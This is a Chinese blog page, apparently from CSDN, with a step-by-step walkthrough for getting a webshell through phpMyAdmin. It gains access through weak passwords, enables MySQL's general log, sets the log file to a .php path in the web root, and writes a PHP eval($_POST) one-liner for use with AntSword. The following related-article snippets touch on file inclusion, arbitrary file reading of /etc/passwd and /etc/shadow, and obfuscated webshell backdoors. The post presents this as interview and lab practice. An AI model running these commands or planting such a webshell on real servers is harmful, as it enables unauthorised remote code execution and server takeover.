fopen的路径怎么写_Phpmyadmin写日志getshell

最新推荐文章于 2023-09-20 15:16:20 发布
最新推荐文章于 2023-09-20 15:16:20 发布
阅读量124 收藏
点赞数
文章标签: fopen的路径怎么写
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35968240/article/details/113072451
版权
本文介绍了如何通过phpmyadmin获取shell的步骤,包括查看数据库路径、开启日志、设置日志文件路径、写入shell代码等。强调了在面试中遇到此类问题时,可以尝试通过写日志文件来实现getshell。建议读者在本地环境中实践操作,以熟悉此技巧。
摘要由CSDN通过智能技术生成

这个算是一个很常见也很基础的getshell的方式,昨天有个小伙伴问到我这个问题,说面试的时候主管给了他一个phpmyadmin登录入口,让他getshell,由于实战经验较少,小伙伴那道题没拿到分。其实,看到phpmyadmin,第一反应就应该是写日志getshell。为了防止大家继续踩坑,特地科普一波。

大家看了以后记得在本地phpstudy环境内动手测试一下,以免后面再遇到这类面试题不知道怎么处理。

前提:mysql>5.0版本,进入phpmyadmin后台(一般都是弱口令进去)。

1.在知道网站绝对路径的情况下,直接去第二步,如果不知道网站绝对路径的情况下

#查看数据库存放路径

select @@datadir;

然后根据数据库存放路径猜测网站的绝对路径。

2.查看日志是否开启

show variables like '%general%';

一般这个日志记录是默认关闭的,需要我们手动开启

3.开启日志记录

SET GLOBAL general_log='on';

4.修改日志路径

set global general_log_file='D:phpStudyWWWshell.php';

#这里一定要用,或者使用/,不能使用。

5.写入shell

select "<?php eval($_POST['gg']);?>";

6.这样就可以用蚁剑连接我们的shell了。

首发于:

Phpmyadmin写日志getshell | web安全学习者的小窝​www.lstazl.com
f365b0ab1c5948f6429fb1b41f3512f5.png
拉菲雪球兔
关注
文件包含漏洞
谢公子的博客
09-23 1万+
目录 文件包含漏洞成因 为什么要包含文件? 如何利用这个漏洞? 本地包含 远程包含 文件包含漏洞的防御 文件包含漏洞成因 文件包含漏洞是代码注入的一种。其原理就是注入一段用户能控制的脚本或代码,并让服务器端执行,代码注入的典型代表就是文件包含File inclusion。文件包含可能会出现在jsp、php、asp等语言中。服务器通过函数去包含任意文件时,由于要包含的这个文件来源过滤...
路径没错html显示不了图片_web前端——路径问题
weixin_39770592的博客
12-01 1万+
路径分为两种:相对路径和绝对路径相对路径:相对于项目而言的路径。绝对路径:在我们电脑硬盘上的路径。一般相对路径,因为我们的项目可能会改变地方,如果绝对路径的话,项目每改一次地方就需要改一次地址,如果地址的地方比较多的话,修改起来会相当麻烦。我们需要路径的地方一般有三个,一个是引用图片,一个是引用样式文件,一个是引用js文件。以<img>标签为例:一、绝对路径: 例如在我的...
php的多功能文件操作类
weixin_30519071的博客
07-05 173
本类为文件操作类,实现了文件的建立,入,删除,修改,复制,移动,创建目录,删除目录,列出目录里的文件等功能,路径后面别忘了加"/" 创建指定路径下的指定文件 * @param string $path(需要包含文件名和后缀) * @param boolean $over_write 是否覆盖文件 * @param int $time 设置时间。默认...
fopen路径怎么_用C++光线追踪:单根光线的渲染
weixin_42362048的博客
01-03 200
0.背景介绍我依稀记得自己过一个“用unity光线追踪”的系列,了有几篇吧,最新一篇的大体内容早已完,但始终无法解决网格模型在unity中的读取问题,故搁置了下去。点数组、面数组与序数总是对不上号。后来我就去看DirectX12和算法相关了,顺带买了本线性代数的书学习。一晃眼竟然过去了四个月多,前些日子偶然看到了samllpt这个项目,99行实现路径追踪,成品相当逼真。我自然是超级感兴趣,...
fopen文件路径怎么_Run Mario!一个越狱插件
weixin_39756192的博客
11-04 192
摘要本文记叙了制作一个越狱插件的过程,它可以解除 SuperMarioRun 在越狱手机上的限制。(SuperMarioRun 是任天堂在 iOS 平台上推出的一款游戏)。插件可以通过 Cydia 安装(搜索 RunMario)。故事春节假期玩了很久的 SuperMarioRun,当得到了前三关的全部九个金币后,终于下决心买了后面的世界,玩得津津有味。前几日发现 iOS 10.2 可以越狱了,作为...
GetShell的姿势总结
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
03-20 4292
0x00 什么是WebShell 渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生。Webshell中的WEB就是web服务,shell就是管理攻击者与操作系统之间的交互。Webshell被称为攻击者通过Web服务器端口对Web服务器有一定的操作权限,而webshell常以网页脚本的形式出现。常见的WebShell使用asp、jsp和php来编,提供了如执行系统命令、文件上传下载、数据库管理等功能。 0x01 获取WebShell的方式 获取W...
【漏洞复现】phpmyadmin后台任意文件包含(CVE-2018-12613)
野原新之助
09-29 808
由于对index.php中包含文件的target参数未作严格的安全校验,导致可以被利用绕过白名单、黑名单校验从而进行本地文件包含,达到GetShell和命令执行的效果。
任意文件读取与下载漏洞学习
不想当脚本小子的脚本小子
01-25 3975
原理: 在web安全中,任意文件读取漏洞是非常常见的一种漏洞,属于文件操作类漏洞,一般常见于PHP/java/python语言中,任意文件读取漏洞,顾名思义,就是可以任意读取服务器上部分或者全部文件的漏洞,攻击者利用此漏洞可以读取服务器敏感文件如/etc/passwd,/etc/sadow,web.config。漏洞一般存在于文件下载参数,文件包含参数。主要是由于程序对传入的文件名或者文件路径没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露。 任意文件读取漏洞的原理其实就是由于程..
DVWA之PHP文件包含漏洞(File Inclusion)
Mi1k7ea
03-08 1万+
文件包含漏洞,简单地说,就是在通过函数包含文件时,由于没有对包含的文件名进行有效的过滤处理,被攻击者利用从而导致了包含了Web根目录以外的文件进来,就会导致文件信息的泄露甚至注入了恶意代码。更多的介绍这里就不多说了,直接上正题~ 文件包含漏洞的一般特征如下: ?page=a.php ?home=a.html ?file=content 目录遍历(Directory
任意文件下载漏洞
L_lemo004的博客
09-22 4526
文章目录任意文件下载0x01 漏洞介绍0x02 漏洞产生原因0x03 漏洞发现Google search一般链接形式包含参数利用方法WEB-INF0x04 漏洞绕过0x05 漏洞利用常见利用文件路径WindowsLinux0x06 漏洞判断0x07 漏洞验证0x08 漏洞防护通用文件下载漏洞修复0x09 文件路径汇总任意文件读取漏洞漏洞产生原因任意文件读取文件读取函数漏洞验证任意文件读取验证 任意文件下载 0x01 漏洞介绍 一些网站由于业务需求,往往需要提供文件查看或文件下载功能,但若对用户
linux下fopen路径怎么,linux下fopen函数的使用
weixin_39908082的博客
05-02 1869
请问在linux系统下使用fopen函数,文件名如何设置,比如根目录下mnt目录下的std.txt文件(std.txt最初不存在),是不是应该fopen("/mnt/std.txt","wb")。我这样运行后返回值是NULL,表明打开失败。请问该如何路径?|楼上说的那个,\是windows下的路径分隔符号.我还是给出具体实例吧:[henryfour@wwwtest]$cata.c...
PHP文件系统-目录操作
weixin_30644369的博客
04-11 126
一、对文件的操作 文件的操作: 创建文件touch(), 删除文件unlink(), 重命名rename, 大小filesize(), 移动复制等 读取 (都有PHP内置函数) 目录的操作: 创建目录(有),删除目录,复制目录, 统计目录大小, 遍历 (自己定义函数) 还有个文件管理系统fileSystem_demo在上面的文件夹中,是用面向对象的方法的 二、遍历目录: opendir...
【C基础语法】fopen-路径
weixin_37629807的博客
08-08 3319
【C基础语法】fopen-相对路径 绝对路径 windows
【C语言】fopen( )函数打开路径设置
crocodlie的博客
06-10 5075
我的源文件在桌面上,要打开桌面上的文件只要填入文件名。例如,打开桌面上的一个.txt文件,如下图,可以打开任意位置上的文件,但是需要和信一样,出文件夹具体的储存路径.1.1 如果你想打开的文件和源文件在同一位置,只需要简单地填入文件名。你当前的工作路径,即你的源文件的储存路径。上面三种法都可以打开(注意斜杠的位置)例如,我要打开一个盘下的文件。再注意,文件名要带后缀.
phpmyadmin日志文件拿weshell
weixin_51692662的博客
09-22 990
phpmyadminshell
C语言读文件
热门推荐
背着行囊去远方的博客
04-21 5万+
一:打开文件句柄 //参数1:文件路径 //参数2:文件打开模式 函数执行成功返回文件流指针,错误返回NULL。 FILE *fopen(const char *path, const char *mode); 模式 操作 区别 文件要求 r 读 ...
PhpMyadmin--getshell
qq_64664156的博客
09-20 632
phpMyAdmin通过MySQL日志文件getshell
PHP大马后门分析
qq_17754023的博客
02-28 4136
PHP大马,用php的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过后门获得服务器的权限。今天就来分析一波该大马中的后门。 分析大马文件 打开下载的php大马,可以看出该大马是经过加密了的。 加密不用说,一看就是有后门 从源码开头可以看见 eval(gzinflate(base64_decode(" base64+gzin..
[C++]C++中的文件路径表示
SMUElpmis's Blog
05-31 1147
本文转自http://blog.csdn.net/zdhlwt2008/article/details/46791407 文件路径的表示可以分为绝对路径和相对路径:   绝对路径表示相对容易,例如   //pDummyFile = fopen("D:\\vctest\\glTexture\\texture\\dummy.bmp", "rb"); 给出了从盘符开始的全部路径,这里需要注意的是“
C语言fopen路径怎么
最新发布
09-14
在C语言中,使用 `fopen` 函数打开文件时,需要指定文件路径路径可以是绝对路径或者相对路径。绝对路径是从根目录开始的完整路径,而相对路径是相对于当前工作目录(即程序运行时所在的目录)的路径。 例如,如果你想打开位于 `C:/Users/用户名/Desktop/myfile.txt` 的文件,你可以直接使用绝对路径: ```c FILE *file = fopen("C:/Users/用户名/Desktop/myfile.txt", "r"); ``` 如果你想打开当前工作目录下的 `myfile.txt` 文件,你可以这样: ```c FILE *file = fopen("myfile.txt", "r"); ``` 如果当前工作目录不是文件所在的目录,而是比如说 `C:/Projects/MyProject`,那么相对路径应该是相对于 `C:/Projects/MyProject` 的。 路径中还可以包含子目录,例如: ```c FILE *file = fopen("data/subdir/myfile.txt", "r"); ``` 这里的 `"data/subdir/myfile.txt"` 表示位于 `data` 子目录下的 `subdir` 子目录中的 `myfile.txt` 文件。 请确保在使用 `fopen` 时,路径中的文件夹和文件名没有书错误,并且程序有足够的权限访问指定路径。另外,要注意文件路径中通常不使用环境变量,除非环境变量被用来定义包含路径的一部分。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值